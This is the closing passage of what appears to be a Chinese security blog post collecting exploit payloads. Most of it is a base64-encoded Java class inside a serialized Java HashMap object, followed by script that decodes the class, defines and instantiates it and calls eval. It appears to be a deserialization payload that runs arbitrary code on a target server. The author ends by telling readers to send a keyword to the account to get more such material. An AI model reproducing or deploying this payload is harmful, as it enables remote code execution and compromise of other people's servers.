vQAeWQMSIlO2AB/AACE6DxkPxwAGp/+RKhkPtgAjtgAkOhAZDrYABBIlBL0AHFkDsgAmU7YAHRkOBL0AHlkDEQD
IuAAnU7YAH1cqEii2ACk6ERkRtgAqOgkZERIrBr0AHFkDEixTWQSyACZTWQWyACZTtgAtGQkGvQAeWQMZEFNZBA
O4ACdTWQUZEL64ACdTtgAfVxkOtgAEEi4EvQAcWQMZEVO2AB0ZDgS9AB5ZAxkJU7YAH1enAE86ESoSMLYAKToSG
RISMQS9ABxZAxIsU7YALRkSBL0AHlkDGRBTtgAfOgkZDrYABBIuBL0AHFkDGRJTtgAdGQ4EvQAeWQMZCVO2AB9X
pwAOpwAFOgiEBgGn/aexAAcAoACrAK4AEgDOANwA3wASAcQCMAIzAC8APwBEAoUALwBHAGIChQAvAGUAhQKFAC8
AiAJ/AoUALwABAJoAAADeADcAAAAXAAQAGAALABkAFQAaABoAGwAmAB0APwAfAEcAIABOACEAZQAiAHAAIwB1AC
QAfQAlAIgAJgCTACcAmAAoAKAAKgCrAC0ArgArALAALADBAC4AxgAvAM4AMQDcADQA3wAyAOEAMwDsADUA8QA2A
PkANwEEADgBCQA5ARcAOgEzADsBPgA8AUMAPQFLAD4BZAA/AYoAQAGPAEEBkgBDAZ0ARAHEAEYBzABHAdMASAIO
AEkCMABOAjMASgI1AEsCPQBMAl0ATQJ/AE8CggBTAoUAUQKHAB0CjQBVAJsAAAAEAAEALwABAJwAnQADAJkAAAA
5AAIAAwAAABEruAAysE24AAK2ADQrtgA1sAABAAAABAAFADMAAQCaAAAADgADAAAAXwAFAGAABgBhAJsAAAAEAA
EAMwCeAAAAAgCfAAEAoAChAAEAmQAAAP8ABAAEAAAAmyvGAAwSNiu2ADeZAAYSOLArtgA5TCsSOrYAO5kAOyort
wA8Ej22AD5NLL4FnwAGEj+wKiwDMrUAQCosBDK4AEG4ACe1AEK7AENZKrcARE4ttgBFEkawKxJHtgA7mQAiKiu3
ADwSPbYAPk0svgWfAAYSSLAqLAMyLAQytgBJsCsSSrYAO5kADSoqK7cAPLYAS7AqKiu3ADy2AEuwAAAAAQCaAAA
AUgAUAAAAawANAGwAEABuABUAbwAeAHEAKQByAC8AcwAyAHUAOQB2AEYAdwBPAHgAUwB5AFYAegBfAHsAagB8AH
AAfQBzAH8AfgCAAIcAgQCRAIMAAQCiAKMAAQCZAAAAdgADAAUAAAA2uwBMWSu3AE1OuwBOWS23AE86BBkELLgAU
LYAURkEtgBSGQS2AFOnAAs6BBkEtgBUsC22AFWwAAEACQAmACkALwABAJoAAAAmAAkAAACOAAkAkAATAJEAHACS
ACEAkwAmAJYAKQCUACsAlQAxAJcAAgCkAKEAAQCZAAAALwADAAIAAAAXKxI6Eja2AFYSShI2tgBWEkcSNrYAVrA
AAAABAJoAAAAGAAEAAACgAAEApQChAAEAmQAAAcMABAAJAAABJxJXuABYtgBZTSu2ADlMAU4sElq2AAyZAEArEl
u2AAyZACArEly2AAyaABe7AF1ZtwBeK7YAXxJgtgBftgBhTAa9ACFZAxIiU1kEEmJTWQUrUzoEpwA9KxJbtgAMm
QAgKxJctgAMmgAXuwBdWbcAXiu2AF8SY7YAX7YAYUwGvQAhWQMSZFNZBBJlU1kFK1M6BLgAZhkEtgBnTrsAaFkt
tgBptwBqEmu2AGw6BRkFtgBtmQALGQW2AG6nAAUSNjoGuwBoWS22AG+3AGoSa7YAbDoFuwBdWbcAXhkGtgBfGQW
2AG2ZAAsZBbYAbqcABRI2tgBftgBhOgYZBjoHLcYABy22AHAZB7A6BRkFtgBUOgYtxgAHLbYAcBkGsDoILcYABy
22AHAZCL8ABACQAPsBBgAvAJAA+wEaAAABBgEPARoAAAEaARwBGgAAAAEAmgAAAGoAGgAAAKkACQCqAA4AqwAQA
K0AGQCuACsArwA/ALEAVgCzAGgAtAB8ALYAkAC5AJkAugCrALsAvwC8ANEAvQD3AL4A+wDCAP8AwwEDAL4BBgC/
AQgAwAEPAMIBEwDDARcAwAEaAMIBIADDAAEApgCnAAEAmQAAAXIABAAMAAAA4hJXuABYtgBZElq2AAyaAAkScU6
nAAYSck64AGYttgBzOgS7AHRZKxy3AHU6BRkEtgBpOgYZBLYAbzoHGQW2AHY6CBkEtgB3OgkZBbYAeDoKGQW2AH
maAGAZBrYAep4AEBkKGQa2AHu2AHyn/+4ZB7YAep4AEBkKGQe2AHu2AHyn/+4ZCLYAep4AEBkJGQi2AHu2AHyn/
+4ZCrYAfRkJtgB9FAB+uACAGQS2AIFXpwAIOgun/54ZBLYAcBkFtgCCpwAgTrsAXVm3AF4Sg7YAXy22AIS2AF8S
hbYAX7YAYbAShrAAAgCnAK0AsAAvAAAAvwDCAC8AAQCaAAAAbgAbAAAA0QAQANIAFgDUABkA1gAiANcALQDYAEI
A2QBQANoAWADbAGAA3ABtAN4AdQDfAIIA4QCKAOIAlwDkAJwA5QChAOYApwDoAK0A6QCwAOoAsgDrALUA7QC6AO
4AvwDxAMIA7wDDAPAA3wDyAAEAqACYAAEAmQAAAC0AAwABAAAAESoqtABAKrQAQrYAh7YAiFexAAAAAQCaAAAAC
gACAAAA9wAQAPgACQCpAKoAAQCZAAABHAAGAAQAAACsAUwSibgAMk0sEooEvQAcWQMSIVO2AB0stgAqBL0AHlkD
KlO2AB/AACzAACxMpwAETSvHAEMSi7gAMhKMA70AHLYAHQEDvQAetgAfTSy2AAQSjQS9ABxZAxIhU7YAHSwEvQA
eWQMqU7YAH8AALMAALEynAARNK8cANBKOuAAyTSwSjQS9ABxZAxIhU7YAHU4tLLYAKgS9AB5ZAypTtgAfwAAswA
AsTKcABE0rsAADAAIALQAwAC8ANQBxAHQALwB5AKYAqQAvAAEAmgAAAEYAEQAAAQAAAgECAAgBAwAtAQYAMAEEA
DEBBwA1AQkATAEKAHEBDQB0AQsAdQEPAHkBEQB/ARIAjwETAKYBFgCpARQAqgEYAAEAqwAAAAIArA==\";\x0ac
lz =
defineClass\x28base64DecodeToByte\x28code\x29\x29;clz.newInstance\x28\x29;t\x00\x04eval
uq\x00~\x00\x1b\x00\x00\x00\x01q\x00~\x00#sr\x00\x11java.util.HashMap\x05\x07\xda\xc1\x
c3\x16`\xd1\x03\x00\x02F\x00\x0aloadFactorI\x00\x09thresholdxp?
@\x00\x00\x00\x00\x00\x00w\x08\x00\x00\x00\x10\x00\x00\x00\x00xxx")}}
好了好了,兄弟们,实在是不想写下去了,熬不住了就算是ctrl+c ctrl+v也是很累了,其实我总结了还有很多,这些只是冰山一角,相关资料我已生成文档,回复关键字自己拿吧。
关注我后直接发送:东南安全24
没有空格我在后台看别的小伙伴回复的有点滑稽。
最后欢迎大家投稿补充并指正我可能出现的我问题。